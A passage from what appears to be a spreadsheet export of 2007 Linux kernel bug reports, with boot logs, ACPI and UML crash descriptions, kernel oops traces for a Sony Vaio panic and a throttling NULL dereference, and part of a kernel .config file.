-i scsi SCSI subsystem initialized scsi0 : ata_piix scsi1 : ata_piix scsi 0:0:0:0: Direct-Access ATA TOSHIBA MK1637GS DL03 PQ: 0 ANSI: 5 sd 0:0:0:0: [sda] Attached SCSI disk scsi 1:0:0:0: CD-ROM HL-DT-ST DVDRAM GSA-T20N WT03 PQ: 0 ANSI: 5 sr0: scsi3-mmc drive: 24x/24x writer dvd-ram cd/rw xa/form2 cdda tray sr 1:0:0:0: Attached scsi CD-ROM sr0 scsi2 : SCSI emulation for USB Mass Storage devices scsi 2:0:0:0: CD-ROM HUAWEI Mass Storage 2.31 PQ: 0 ANSI: 2 sr1: scsi3-mmc drive: 0x/0x caddy sr 2:0:0:0: Attached scsi CD-ROM sr1 LUN scan shows HUAWEI as type "cdrom" again: /etc/rc.d/rc.scanluns Scanning all LUNs for additional hardware: /sbin/rescan-scsi-bus -l Host adapter 0 (ata_piix) found. Host adapter 1 (ata_piix) found. Host adapter 2 (usb-storage) found. Scanning hosts 0 1 2 channels 0 for SCSI target IDs 0 1 2 3 4 5 6 7 , LUNs 0 1 2 3 4 5 6 7 Scanning for device 0 0 0 0 ... OLD: Host: scsi0 Channel: 00 Id: 00 Lun: 00 Vendor: ATA Model: TOSHIBA MK1637GS Rev: DL03 Type: Direct-Access ANSI SCSI revision: 05 Scanning for device 1 0 0 0 ... OLD: Host: scsi1 Channel: 00 Id: 00 Lun: 00 Vendor: HL-DT-ST Model: DVDRAM GSA-T20N Rev: WT03 Type: CD-ROM ANSI SCSI revision: 05 Scanning for device 2 0 0 0 ... OLD: Host: scsi2 Channel: 00 Id: 00 Lun: 00 Vendor: HUAWEI Model: Mass Storage Rev: 2.31 Type: CD-ROM ANSI SCSI revision: 02 0 new device(s) found. 0 device(s) removed. Modules: usb_storage 31812 0 usbserial 25320 4 option soundcore 5792 1 snd uhci_hcd 19404 0 ehci_hcd 26444 0 Steps to reproduce: reboot with modem connected</t>
  </si>
  <si>
    <t>UML SEGFAULTS if any command-line arguments given</t>
  </si>
  <si>
    <t>2007-07-23 07:10 UTC</t>
  </si>
  <si>
    <t>Giedrius Liubavičius</t>
  </si>
  <si>
    <t>2007-08-27 10:00 UTC</t>
  </si>
  <si>
    <t>Host environment: openSuSE 10.2 x86_64, 2.6.18.8-0.5-skas3-v9-pre9 Most recent kernel where this bug did not occur: 2.6.20.5 Problem Description: SIGSEGV in arch/um/um_arch.c on uml_checksetup() Cause: p-&gt;str = NULL SIGSEGV is received upon n = strlen(p-&gt;str) Steps to reproduce: Pass any command line argument</t>
  </si>
  <si>
    <t>Duplicate VID directory in /proc/acpi/video</t>
  </si>
  <si>
    <t>2007-07-23 15:30 UTC</t>
  </si>
  <si>
    <t>2007-08-25 21:07 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Hardware Environment: Software Environment: Problem Description: Steps to reproduce:</t>
  </si>
  <si>
    <t>ACPI Exception (processor_throttling-0084): AE_NOT_FOUND, Evaluating _PTC [20070126]</t>
  </si>
  <si>
    <t>2.6.23-rc1</t>
  </si>
  <si>
    <t>2007-07-24 12:58 UTC</t>
  </si>
  <si>
    <t>Daniel Viczinger</t>
  </si>
  <si>
    <t>2007-07-25 16:41 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.22.1 Distribution: Slackware-current Hardware Environment: 2.4XP, 768Ram, Abit KX7-333 with VIA VT8366 chipset Software Environment: Slackware, gcc 4.1.2, 2.6.23-rc1 Problem Description: 1, Getting these during boot: Jul 24 21:40:41 skogen kernel: ACPI Exception (processor_throttling-0084): AE_NOT_FOUND, Evaluating _PTC [20070126] Jul 24 21:40:41 skogen kernel: ACPI Exception (processor_throttling-0147): AE_NOT_FOUND, Evaluating _TSS [20070126] 2, After doing what I wrote below I get in syslog: BUG: unable to handle kernel NULL pointer dereference at virtual address 00000000 printing eip: c01cc098 *pdpt = 000000002a912001 *pde = 0000000000000000 Oops: 0000 [#2] PREEMPT Modules linked in: CPU: 0 EIP: 0060:[&lt;c01cc098&gt;] Tainted: P D VLI EFLAGS: 00010246 (2.6.23-rc1 #1) EIP is at acpi_processor_throttling_seq_show+0x98/0xdc eax: 00000000 ebx: effb8100 ecx: 00000000 edx: 00000000 esi: c1764000 edi: 00000000 ebp: ed515040 esp: ef381ef8 ds: 007b es: 007b fs: 0000 gs: 0033 ss: 0068 Process cat (pid: 1273, ti=ef380000 task=ed62e000 task.ti=ef380000) Stack: ed515040 c02f39ad 00000002 00000000 00000000 00000001 00000000 effb8100 ed515040 00000001 00001000 c01615c3 0804f000 ea0d8c80 ed515060 00000000 ed6606b4 ed660680 00000001 c010c12d 00000000 00000000 effb8100 c01614dc Call Trace: [&lt;c01615c3&gt;] seq_read+0xe7/0x274 [&lt;c010c12d&gt;] do_page_fault+0x318/0x739 [&lt;c01614dc&gt;] seq_read+0x0/0x274 [&lt;c0172e14&gt;] proc_reg_read+0x83/0x96 [&lt;c0172d91&gt;] proc_reg_read+0x0/0x96 [&lt;c014be5b&gt;] vfs_read+0x7c/0xb2 [&lt;c014c157&gt;] sys_read+0x41/0x67 [&lt;c010252e&gt;] syscall_call+0x7/0xb ======================= Code: e8 95 50 f9 ff ba 03 3a 2f c0 89 e8 e8 74 4e f9 ff c7 44 24 18 00 00 00 00 eb 42 8b 86 04 03 00 00 8b 54 24 18 3b be d8 02 00 00 &lt;8b&gt; 0c 02 b8 20 00 00 00 ba 2a 00 00 00 89 7c 24 0c c7 44 24 04 EIP: [&lt;c01cc098&gt;] acpi_processor_throttling_seq_show+0x98/0xdc SS:ESP 0068:ef381ef8 Steps to reproduce: cat /proc/acpi/processor/CPU0/throttling (segfaults) Note: Same as this: http://lkml.org/lkml/2007/6/7/60, it apparently got fixed in 2.6.22-rc4 but it still is here. It doesn't affect anything other I do.</t>
  </si>
  <si>
    <t>Sony Vaio Picturebook PCG-C1VE: Kernel panic - not syncinc: Fatal exception in interrupt</t>
  </si>
  <si>
    <t>2007-07-24 13:02 UTC</t>
  </si>
  <si>
    <t>Stefan Foerster</t>
  </si>
  <si>
    <t>Mattia Dongili</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.21.1 Distribution: Ubuntu Gutsy Gibbon (Tribe 3), but plain vanilla kernel, not the Ubuntu kernel (I always use my own kernel) Hardware Environment: Sony Vaio Picturebook PCG-C1VE, 192 MB, Transmeta Crusoe TM5600, 600 MHz Software Environment: gcc-Version 4.1.3 20070718 (prerelease) /Ubuntu 4.1.2-14ubuntu1), CFLAGS=-0s -march=i586 -mmx -pipe -fomit-frame-pointer Problem Description: I get a kernel panic early during startup Steps to reproduce: Compile the kernel 2.6.22.1 using the .config below on a PCG-C1E using the following command: make-kpkg --append_to_version -crusoe --initrd --bzImage --revision=1 --stem=linux kernel_image and install it wit dpkg. Restart the system. You will get the following result (I had to type it from the screen output): -------------------- [&lt;c01450c4&gt;] setup_irq+0xc4/0x190 [&lt;c026a800&gt;] input_register_device+0x1c0/0x1e0 [&lt;c024f480&gt;] sony_pic_irq+0x0/0x170 [&lt;c0145231&gt;] request_irq+0xa1/0xc0 [&lt;c024fd7b&gt;] sony_pic_add+0x2eb/0x590 [&lt;c021af93&gt;] acpi_device_probe+0x33/0x80 [&lt;c02486bd&gt;] driver_probe_device+0x8d/0x190 [&lt;c024892a&gt;] __driver_attach+0x9a/0xa0 [&lt;c0247aea&gt;] bus_for_each_dev+0x3a/0x60 [&lt;c0248536&gt;] driver_attach+0x16/0x20 [&lt;c0248890&gt;] __driver_attach+0x0/0xa0 [&lt;c0247e7a&gt;] bus_add_driver+0x8a/0x1b0 [&lt;c03abc2a&gt;] sony_laptop_init+0x6a/0x80 [&lt;c0390735&gt;] kernel_init+0x85/0x260 [&lt;c0103da6&gt;] ret_from_fork+0x6/0x1c [&lt;c03906b0&gt;] kernel_init+0x0/0x260 [&lt;c03906b0&gt;] kernel_init+0x0/0x260 [&lt;c01049eb&gt;] kernel_thread_helper+0x7/0x1c ======================= Code: 85 d2 0f 44 f4 83 f9 10 74 11 83 f9 20 74 15 83 f9 08 75 17 89 da ec 88 06 eb 14 89 da 66 ed 66 89 06 eb 0b 89 da ed 89 06 eb 04 &lt;0f&gt; 0b eb fe 5a 31 c0 5b 5e c3 66 90 83 f9 10 53 89 c3 89 d0 74 EIP: [&lt;c0201e44&gt;] acpi_os_read_port+0x34/0x40 SS:ESP 0068:c119bdbc Kernel panic - not syncing: Fatal exception in interrupt -------------------------------------------------------------- Here is the 2.6.22.1 .config file used: -------------------------------------------------------------- # # Automatically generated make config: don't edit # Linux kernel version: 2.6.22.1-20070715-crusoe # Sun Jul 22 23:23:40 2007 # CONFIG_X86_32=y CONFIG_GENERIC_TIME=y CONFIG_CLOCKSOURCE_WATCHDOG=y CONFIG_GENERIC_CLOCKEVENTS=y CONFIG_GENERIC_CLOCKEVENTS_BROADCAST=y CONFIG_LOCKDEP_SUPPORT=y CONFIG_STACKTRACE_SUPPORT=y CONFIG_SEMAPHORE_SLEEPERS=y CONFIG_X86=y CONFIG_MMU=y CONFIG_ZONE_DMA=y CONFIG_QUICKLIST=y CONFIG_GENERIC_ISA_DMA=y CONFIG_GENERIC_IOMAP=y CONFIG_GENERIC_BUG=y CONFIG_GENERIC_HWEIGHT=y CONFIG_ARCH_MAY_HAVE_PC_FDC=y CONFIG_DMI=y CONFIG_DEFCONFIG_LIST="/lib/modules/$UNAME_RELEASE/.config" # # Code maturity level options # CONFIG_EXPERIMENTAL=y CONFIG_BROKEN_ON_SMP=y CONFIG_INIT_ENV_ARG_LIMIT=32 # # General setup # CONFIG_LOCALVERSION="" # CONFIG_LOCALVERSION_AUTO is not set CONFIG_SWAP=y CONFIG_SYSVIPC=y # CONFIG_IPC_NS is not set CONFIG_SYSVIPC_SYSCTL=y CONFIG_POSIX_MQUEUE=y CONFIG_BSD_PROCESS_ACCT=y CONFIG_BSD_PROCESS_ACCT_V3=y # CONFIG_TASKSTATS is not set # CONFIG_UTS_NS is not set CONFIG_AUDIT=y CONFIG_AUDITSYSCALL=y CONFIG_IKCONFIG=y CONFIG_IKCONFIG_PROC=y CONFIG_LOG_BUF_SHIFT=14 # CONFIG_SYSFS_DEPRECATED is not set # CONFIG_RELAY is not set CONFIG_BLK_DEV_INITRD=y CONFIG_INITRAMFS_SOURCE="" # CONFIG_CC_OPTIMIZE_FOR_SIZE is not set CONFIG_SYSCTL=y # CONFIG_EMBEDDED is not set CONFIG_UID16=y CONFIG_SYSCTL_SYSCALL=y CONFIG_KALLSYMS=y # CONFIG_KALLSYMS_EXTRA_PASS is not set CONFIG_HOTPLUG=y CONFIG_PRINTK=y CONFIG_BUG=y CONFIG_ELF_CORE=y CONFIG_BASE_FULL=y CONFIG_FUTEX=y CONFIG_ANON_INODES=y CONFIG_EPOLL=y CONFIG_SIGNALFD=y CONFIG_TIMERFD=y CONFIG_EVENTFD=y CONFIG_SHMEM=y CONFIG_VM_EVENT_COUNTERS=y CONFIG_SLAB=y # CONFIG_SLUB is not set # CONFIG_SLOB is not set CONFIG_RT_MUTEXES=y # CONFIG_TINY_SHMEM is not set CONFIG_BASE_SMALL=0 # # Loadable module support # CONFIG_MODULES=y CONFIG_MODULE_UNLOAD=y # CONFIG_MODULE_FORCE_UNLOAD is not set CONFIG_MODVERSIONS=y # CONFIG_MODULE_SRCVERSION_ALL is not set CONFIG_KMOD=y # # Block layer # CONFIG_BLOCK=y # CONFIG_LBD is not set # CONFIG_BLK_DEV_IO_TRACE is not set # CONFIG_LSF is not set # # IO Schedulers # CONFIG_IOSCHED_NOOP=y # CONFIG_IOSCHED_AS is not set # CONFIG_IOSCHED_DEADLINE is not set CONFIG_IOSCHED_CFQ=y # CONFIG_DEFAULT_AS is not set # CONFIG_DEFAULT_DEADLINE is not set CONFIG_DEFAULT_CFQ=y # CONFIG_DEFAULT_NOOP is not set CONFIG_DEFAULT_IOSCHED="cfq" # # Processor type and features # CONFIG_TICK_ONESHOT=y CONFIG_NO_HZ=y CONFIG_HIGH_RES_TIMERS=y # CONFIG_SMP is not set CONFIG_X86_PC=y # CONFIG_X86_ELAN is not set # CONFIG_X86_VOYAGER is not set # CONFIG_X86_NUMAQ is not set # CONFIG_X86_SUMMIT is not set # CONFIG_X86_BIGSMP is not set # CONFIG_X86_VISWS is not set # CONFIG_X86_GENERICARCH is not set # CONFIG_X86_ES7000 is not set # CONFIG_PARAVIRT is not set # CONFIG_M386 is not set # CONFIG_M486 is not set # CONFIG_M586 is not set # CONFIG_M586TSC is not set # CONFIG_M586MMX is not set # CONFIG_M686 is not set # CONFIG_MPENTIUMII is not set # CONFIG_MPENTIUMIII is not set # CONFIG_MPENTIUMM is not set # CONFIG_MCORE2 is not set # CONFIG_MPENTIUM4 is not set # CONFIG_MK6 is not set # CONFIG_MK7 is not set # CONFIG_MK8 is not set CONFIG_MCRUSOE=y # CONFIG_MEFFICEON is not set # CONFIG_MWINCHIPC6 is not set # CONFIG_MWINCHIP2 is not set # CONFIG_MWINCHIP3D is not set # CONFIG_MGEODEGX1 is not set # CONFIG_MGEODE_LX is not set # CONFIG_MCYRIXIII is not set # CONFIG_MVIAC3_2 is not set # CONFIG_MVIAC7 is not set # CONFIG_X86_GENERIC is not set CONFIG_X86_CMPXCHG=y CONFIG_X86_L1_CACHE_SHIFT=5 CONFIG_X86_XADD=y CONFIG_RWSEM_XCHGADD_ALGORITHM=y # CONFIG_ARCH_HAS_ILOG2_U32 is not set # CONFIG_ARCH_HAS_ILOG2_U64 is not set CONFIG_GENERIC_CALIBRATE_DELAY=y CONFIG_X86_WP_WORKS_OK=y CONFIG_X86_INVLPG=y CONFIG_X86_BSWAP=y CONFIG_X86_POPAD_OK=y CONFIG_X86_TSC=y CONFIG_X86_MINIMUM_CPU_MODEL=4 CONFIG_HPET_TIMER=y CONFIG_HPET_EMULATE_RTC=y # CONFIG_PREEMPT_NONE is not set CONFIG_PREEMPT_VOLUNTARY=y # CONFIG_PREEMPT is not set CONFIG_X86_UP_APIC=y CONFIG_X86_UP_IOAPIC=y CONFIG_X86_LOCAL_APIC=y CONFIG_X86_IO_APIC=y CONFIG_X86_MCE=y # CONFIG_X86_MCE_NONFATAL is not set # CONFIG_X86_MCE_P4THERMAL is not set CONFIG_VM86=y # CONFIG_TOSHIBA is not set # CONFIG_I8K is not set # CONFIG_X86_REBOOTFIXUPS is not set # CONFIG_MICROCODE is not set CONFIG_X86_MSR=y CONFIG_X86_CPUID=y # # Firmware Drivers # # CONFIG_EDD is not set # CONFIG_DELL_RBU is not set # CONFIG_DCDBAS is not set CONFIG_NOHIGHMEM=y # CONFIG_HIGHMEM4G is not set # CONFIG_HIGHMEM64G is not set CONFIG_PAGE_OFFSET=0xC0000000 CONFIG_ARCH_FLATMEM_ENABLE=y CONFIG_ARCH_SPARSEMEM_ENABLE=y CONFIG_ARCH_SELECT_MEMORY_MODEL=y CONFIG_ARCH_POPULATES_NODE_MAP=y CONFIG_SELECT_MEMORY_MODEL=y CONFIG_FLATMEM_MANUAL=y # CONFIG_DISCONTIGMEM_MANUAL is not set # CONFIG_SPARSEMEM_MANUAL is not set CONFIG_FLATMEM=y CONFIG_FLAT_NODE_MEM_MAP=y CONFIG_SPARSEMEM_STATIC=y CONFIG_SPLIT_PTLOCK_CPUS=4 # CONFIG_RESOURCES_64BIT is not set CONFIG_ZONE_DMA_FLAG=1 CONFIG_NR_QUICK=1 # CONFIG_MATH_EMULATION is not set CONFIG_MTRR=y # CONFIG_EFI is not set CONFIG_SECCOMP=y # CONFIG_HZ_100 is not set # CONFIG_HZ_250 is not set # CONFIG_HZ_300 is not set CONFIG_HZ_1000=y CONFIG_HZ=1000 # CONFIG_KEXEC is not set CONFIG_PHYSICAL_START=0x100000 # CONFIG_RELOCATABLE is not set CONFIG_PHYSICAL_ALIGN=0x100000 # CONFIG_COMPAT_VDSO is not set # # Power management options (ACPI, APM) # CONFIG_PM=y # CONFIG_PM_LEGACY is not set # CONFIG_PM_DEBUG is not set # CONFIG_PM_SYSFS_DEPRECATED is not set CONFIG_SOFTWARE_SUSPEND=y CONFIG_PM_STD_PARTITION="/dev/hda2" # # ACPI (Advanced Configuration and Power Interface) Support # CONFIG_ACPI=y CONFIG_ACPI_SLEEP=y CONFIG_ACPI_SLEEP_PROC_FS=y # CONFIG_ACPI_SLEEP_PROC_SLEEP is not set CONFIG_ACPI_PROCFS=y CONFIG_ACPI_AC=y CONFIG_ACPI_BATTERY=y CONFIG_ACPI_BUTTON=y CONFIG_ACPI_VIDEO=m CONFIG_ACPI_FAN=y CONFIG_ACPI_DOCK=m CONFIG_ACPI_BAY=m CONFIG_ACPI_PROCESSOR=y CONFIG_ACPI_THERMAL=y # CONFIG_ACPI_ASUS is not set # CONFIG_ACPI_TOSHIBA is not set # CONFIG_ACPI_CUSTOM_DSDT is not set CONFIG_ACPI_BLACKLIST_YEAR=2000 # CONFIG_ACPI_DEBUG is not set CONFIG_ACPI_EC=y CONFIG_ACPI_POWER=y CONFIG_ACPI_SYSTEM=y CONFIG_X86_PM_TIMER=y # CONFIG_ACPI_CONTAINER is not set CONFIG_ACPI_SBS=m CONFIG_APM=m # CONFIG_APM_IGNORE_USER_SUSPEND is not set # CONFIG_APM_DO_ENABLE is not set CONFIG_APM_CPU_IDLE=y # CONFIG_APM_DISPLAY_BLANK is not set # CONFIG_APM_ALLOW_INTS is not set # CONFIG_APM_REAL_MODE_POWER_OFF is not set # # CPU Frequency scaling # CONFIG_CPU_FREQ=y CONFIG_CPU_FREQ_TABLE=m # CONFIG_CPU_FREQ_DEBUG is not set CONFIG_CPU_FREQ_STAT=m CONFIG_CPU_FREQ_STAT_DETAILS=y # CONFIG_CPU_FREQ_DEFAULT_GOV_PERFORMANCE is not set CONFIG_CPU_FREQ_DEFAULT_GOV_USERSPACE=y # CONFIG_CPU_FREQ_GOV_PERFORMANCE is not set # CONFIG_CPU_FREQ_GOV_POWERSAVE is not set CONFIG_CPU_FREQ_GOV_USERSPACE=y # CONFIG_CPU_FREQ_GOV_ONDEMAND is not set CONFIG_CPU_FREQ_GOV_CONSERVATIVE=m # # CPUFreq processor drivers # # CONFIG_X86_ACPI_CPUFREQ is not set # CONFIG_X86_POWERNOW_K6 is not set # CONFIG_X86_POWERNOW_K7 is not set # CONFIG_X86_POWERNOW_K8 is not set # CONFIG_X86_GX_SUSPMOD is not set # CONFIG_X86_SPEEDSTEP_CENTRINO is not set # CONFIG_X86_SPEEDSTEP_ICH is not set # CONFIG_X86_SPEEDSTEP_SMI is not set # CONFIG_X86_P4_CLOCKMOD is not set # CONFIG_X86_CPUFREQ_NFORCE2 is not set CONFIG_X86_LONGRUN=y # CONFIG_X86_LONGHAUL is not set # CONFIG_X86_E_POWERSAVER is not set # # shared options # # CONFIG_X86_SPEEDSTEP_LIB is not set # # Bus options (PCI, PCMCIA, EISA, MCA, ISA) # CONFIG_PCI=y # CONFIG_PCI_GOBIOS is not set # CONFIG_PCI_GOMMCONFIG is not set # CONFIG_PCI_GODIRECT is not set CONFIG_PCI_GOANY=y CONFIG_PCI_BIOS=y CONFIG_PCI_DIRECT=y CONFIG_PCI_MMCONFIG=y # CONFIG_PCIEPORTBUS is not set CONFIG_ARCH_SUPPORTS_MSI=y # CONFIG_PCI_MSI is not set CONFIG_HT_IRQ=y CONFIG_ISA_DMA_API=y # CONFIG_ISA is not set # CONFIG_MCA is not set # CONFIG_SCx200 is not set CONFIG_K8_NB=y # # PCCARD (PCMCIA/CardBus) support # CONFIG_PCCARD=y # CONFIG_PCMCIA_DEBUG is not set CONFIG_PCMCIA=m CONFIG_PCMCIA_LOAD_CIS=y CONFIG_PCMCIA_IOCTL=y CONFIG_CARDBUS=y # # PC-card bridges # CONFIG_YENTA=y CONFIG_YENTA_O2=y CONFIG_YENTA_RICOH=y CONFIG_YENTA_TI=y CONFIG_YENTA_ENE_TUNE=y CONFIG_YENTA_TOSHIBA=y CONFIG_PD6729=m CONFIG_I82092=m CONFIG_PCCARD_NONSTATIC=y # CONFIG_HOTPLUG_PCI is not set # # Executable file formats # CONFIG_BINFMT_ELF=y # CONFIG_BINFMT_AOUT is not set CONFIG_BINFMT_MISC=m # # Networking # CONFIG_NET=y # # Networking options # CONFIG_PACKET=y CONFIG_PACKET_MMAP=y CONFIG_UNIX=y CONFIG_XFRM=y CONFIG_XFRM_USER=y # CONFIG_XFRM_SUB_POLICY is not set # CONFIG_XFRM_MIGRATE is not set CONFIG_NET_KEY=y # CONFIG_NET_KEY_MIGRATE is not set CONFIG_INET=y # CONFIG_IP_MULTICAST is not set CONFIG_IP_ADVANCED_ROUTER=y CONFIG_ASK_IP_FIB_HASH=y # CONFIG_IP_FIB_TRIE is not set CONFIG_IP_FIB_HASH=y # CONFIG_IP_MULTIPLE_TABLES is not set # CONFIG_IP_ROUTE_MULTIPATH is not set CONFIG_IP_ROUTE_VERBOSE=y # CONFIG_IP_PNP is not set CONFIG_NET_IPIP=m CONFIG_NET_IPGRE=m # CONFIG_ARPD is not set # CONFIG_SYN_COOKIES is not set CONFIG_INET_AH=y CONFIG_INET_ESP=y CONFIG_INET_IPCOMP=y CONFIG_INET_XFRM_TUNNEL=y CONFIG_INET_TUNNEL=y CONFIG_INET_XFRM_MODE_TRANSPORT=y CONFIG_INET_XFRM_MODE_TUNNEL=y CONFIG_INET_XFRM_MODE_BEET=y CONFIG_INET_DIAG=y CONFIG_INET_TCP_DIAG=y # CONFIG_TCP_CONG_ADVANCED is not set CONFIG_TCP_CONG_CUBIC=y CONFIG_DEFAULT_TCP_CONG="cubic" # CONFIG_TCP_MD5SIG is not set # CONFIG_IP_VS is not set CONFIG_IPV6=m CONFIG_IPV6_PRIVACY=y # CONFIG_IPV6_ROUTER_PREF is not set # CONFIG_IPV6_OPTIMISTIC_DAD is not set CONFIG_INET6_AH=m CONFIG_INET6_ESP=m CONFIG_INET6_IPCOMP=m # CONFIG_IPV6_MIP6 is not set CONFIG_INET6_XFRM_TUNNEL=m CONFIG_INET6_TUNNEL=m CONFIG_INET6_XFRM_MODE_TRANSPORT=m CONFIG_INET6_XFRM_MODE_TUNNEL=m CONFIG_INET6_XFRM_MODE_BEET=m CONFIG_INET6_XFRM_MODE_ROUTEOPTIMIZATION=m CONFIG_IPV6_SIT=m CONFIG_IPV6_TUNNEL=m # CONFIG_IPV6_MULTIPLE_TABLES is not set CONFIG_NETWORK_SECMARK=y CONFIG_NETFILTER=y # CONFIG_NETFILTER_DEBUG is not set # # Core Netfilter Configuration # CONFIG_NETFILTER_NETLINK=m CONFIG_NETFILTER_NETLINK_QUEUE=m CONFIG_NETFILTER_NETLINK_LOG=m # CONFIG_NF_CONNTRACK_ENABLED is not set # CONFIG_NF_CONNTRACK is not set CONFIG_NETFILTER_XTABLES=m CONFIG_NETFILTER_XT_TARGET_CLASSIFY=m CONFIG_NETFILTER_XT_TARGET_DSCP=m CONFIG_NETFILTER_XT_TARGET_MARK=m CONFIG_NETFILTER_XT_TARGET_NFQUEUE=m CONFIG_NETFILTER_XT_TARGET_NFLOG=m CONFIG_NETFILTER_XT_TARGET_SECMARK=m CONFIG_NETFILTER_XT_TARGET_TCPMSS=m CONFIG_NETFILTER_XT_MATCH_COMMENT=m CONFIG_NETFILTER_XT_MATCH_DCCP=m CONFIG_NETFILTER_XT_MATCH_DSCP=m CONFIG_NETFILTER_XT_MATCH_ESP=m CONFIG_NETFILTER_XT_MATCH_LENGTH=m CONFIG_NETFILTER_XT_MATCH_LIMIT=m CONFIG_NETFILTER_XT_MATCH_MAC=m CONFIG_NETFILTER_XT_MATCH_MARK=m CONFIG_NETFILTER_XT_MATCH_POLICY=m CONFIG_NETFILTER_XT_MATCH_MULTIPORT=m CONFIG_NETFILTER_XT_MATCH_PKTTYPE=m CONFIG_NETFILTER_XT_MATCH_QUOTA=m CONFIG_NETFILTER_XT_MATCH_REALM=m CONFIG_NETFILTER_XT_MATCH_SCTP=m CONFIG_NETFILTER_XT_MATCH_STATISTIC=m CONFIG_NETFILTER_XT_MATCH_STRING=m CONFIG_NETFILTER_XT_MATCH_TCPMSS=m CONFIG_NETFILTER_XT_MATCH_HASHLIMIT=m # # IP: Netfilter Configuration # # CONFIG_IP_NF_QUEUE is not set CONFIG_IP_NF_IPTABLES=m CONFIG_IP_NF_MATCH_IPRANGE=m CONFIG_IP_NF_MATCH_TOS=m CONFIG_IP_NF_MATCH_RECENT=m CONFIG_IP_NF_MATCH_ECN=m CONFIG_IP_NF_MATCH_AH=m CONFIG_IP_NF_MATCH_TTL=m CONFIG_IP_NF_MATCH_OWNER=m CONFIG_IP_NF_MATCH_ADDRTYPE=m CONFIG_IP_NF_FILTER=m CONFIG_IP_NF_TARGET_REJECT=m CONFIG_IP_NF_TARGET_LOG=m CONFIG_IP_NF_TARGET_ULOG=m CONFIG_IP_NF_MANGLE=m CONFIG_IP_NF_TARGET_TOS=m CONFIG_IP_NF_TARGET_ECN=m CONFIG_IP_NF_TARGET_TTL=m CONFIG_IP_NF_RAW=m CONFIG_IP_NF_ARPTABLES=m CONFIG_IP_NF_ARPFILTER=m CONFIG_IP_NF_ARP_MANGLE=m # # IPv6: Netfilter Configuration (EXPERIMENTAL) # CONFIG_IP6_NF_QUEUE=m CONFIG_IP6_NF_IPTABLES=m CONFIG_IP6_NF_MATCH_RT=m CONFIG_IP6_NF_MATCH_OPTS=m CONFIG_IP6_NF_MATCH_FRAG=m CONFIG_IP6_NF_MATCH_HL=m CONFIG_IP6_NF_MATCH_OWNER=m CONFIG_IP6_NF_MATCH_IPV6HEADER=m CONFIG_IP6_NF_MATCH_AH=m CONFIG_IP6_NF_MATCH_MH=m CONFIG_IP6_NF_MATCH_EUI64=m CONFIG_IP6_NF_FILTER=m CONFIG_IP6_NF_TARGET_LOG=m CONFIG_IP6_NF_TARGET_REJECT=m CONFIG_IP6_NF_MANGLE=m CONFIG_IP6_NF_TARGET_HL=m CONFIG_IP6_NF_RAW=m # CONFIG_IP_DCCP is not set CONFIG_IP_SCTP=m # CONFIG_SCTP_DBG_MSG is not set # CONFIG_SCTP_DBG_OBJCNT is not set # CONFIG_SCTP_HMAC_NONE is not set CONFIG_SCTP_HMAC_SHA1=y # CONFIG_SCTP_HMAC_MD5 is not set # CONFIG_TIPC is not set # CONFIG_ATM is not set # CONFIG_BRIDGE is not set # CONFIG_VLAN_8021Q is not set # CONFIG_DECNET is not set # CONFIG_LLC2 is not set # CONFIG_IPX is not set # CONFIG_ATALK is not set # CONFIG_X25 is not set # CONFIG_LAPB is not set # CONFIG_ECONET is not set # CONFIG_WAN_ROUTER is not set # # QoS and/or fair queueing # # CONFIG_NET_SCHED is not set CONFIG_NET_SCH_FIFO=y CONFIG_NET_CLS_ROUTE=y # # Network testing # # CONFIG_NET_PKTGEN is not set # CONFIG_HAMRADIO is not set CONFIG_IRDA=m # # IrDA protocols # CONFIG_IRLAN=m CONFIG_IRNET=m CONFIG_IRCOMM=m CONFIG_IRDA_ULTRA=y # # IrDA options # CONFIG_IRDA_CACHE_LAST_LSAP=y CONFIG_IRDA_FAST_RR=y # CONFIG_IRDA_DEBUG is not set # # Infrared-port device drivers # # # SIR device drivers # CONFIG_IRTTY_SIR=m # # Dongle support # CONFIG_DONGLE=y CONFIG_ESI_DONGLE=m CONFIG_ACTISYS_DONGLE=m CONFIG_TEKRAM_DONGLE=m CONFIG_TOIM3232_DONGLE=m CONFIG_LITELINK_DONGLE=m CONFIG_MA600_DONGLE=m CONFIG_GIRBIL_DONGLE=m CONFIG_MCP2120_DONGLE=m CONFIG_OLD_BELKIN_DONGLE=m CONFIG_ACT200L_DONGLE=m # CONFIG_KINGSUN_DONGLE is not set # # Old SIR device drivers # CONFIG_IRPORT_SIR=m # # Old Serial dongle support # # CONFIG_DONGLE_OLD is not set # # FIR device drivers # CONFIG_USB_IRDA=m CONFIG_SIGMATEL_FIR=m CONFIG_NSC_FIR=m CONFIG_WINBOND_FIR=m CONFIG_TOSHIBA_FIR=m CONFIG_SMC_IRCC_FIR=m CONFIG_ALI_FIR=m CONFIG_VLSI_FIR=m CONFIG_VIA_FIR=m CONFIG_MCS_FIR=m CONFIG_BT=m CONFIG_BT_L2CAP=m CONFIG_BT_SCO=m CONFIG_BT_RFCOMM=m CONFIG_BT_RFCOMM_TTY=y CONFIG_BT_BNEP=m CONFIG_BT_BNEP_MC_FILTER=y CONFIG_BT_BNEP_PROTO_FILTER=y CONFIG_BT_HIDP=m # # Bluetooth device drivers # CONFIG_BT_HCIUSB=m CONFIG_BT_HCIUSB_SCO=y CONFIG_BT_HCIUART=m CONFIG_BT_HCIUART_H4=y CONFIG_BT_HCIUART_BCSP=y CONFIG_BT_HCIBCM203X=m CONFIG_BT_HCIBPA10X=m CONFIG_BT_HCIBFUSB=m CONFIG_BT_HCIDTL1=m CONFIG_BT_HCIBT3C=m CONFIG_BT_HCIBLUECARD=m CONFIG_BT_HCIBTUART=m CONFIG_BT_HCIVHCI=m # CONFIG_AF_RXRPC is not set # # Wireless # CONFIG_CFG80211=m CONFIG_WIRELESS_EXT=y CONFIG_MAC80211=m # CONFIG_MAC80211_DEBUG is not set CONFIG_IEEE80211=m # CONFIG_IEEE80211_DEBUG is not set CONFIG_IEEE80211_CRYPT_WEP=m CONFIG_IEEE80211_CRYPT_CCMP=m CONFIG_IEEE80211_CRYPT_TKIP=m CONFIG_IEEE80211_SOFTMAC=m # CONFIG_IEEE80211_SOFTMAC_DEBUG is not set CONFIG_RFKILL=m CONFIG_RFKILL_INPUT=m # # Device Drivers # # # Generic Driver Options # # CONFIG_STANDALONE is not set # CONFIG_PREVENT_FIRMWARE_BUILD is not set CONFIG_FW_LOADER=y # CONFIG_SYS_HYPERVISOR is not set # # Connector - 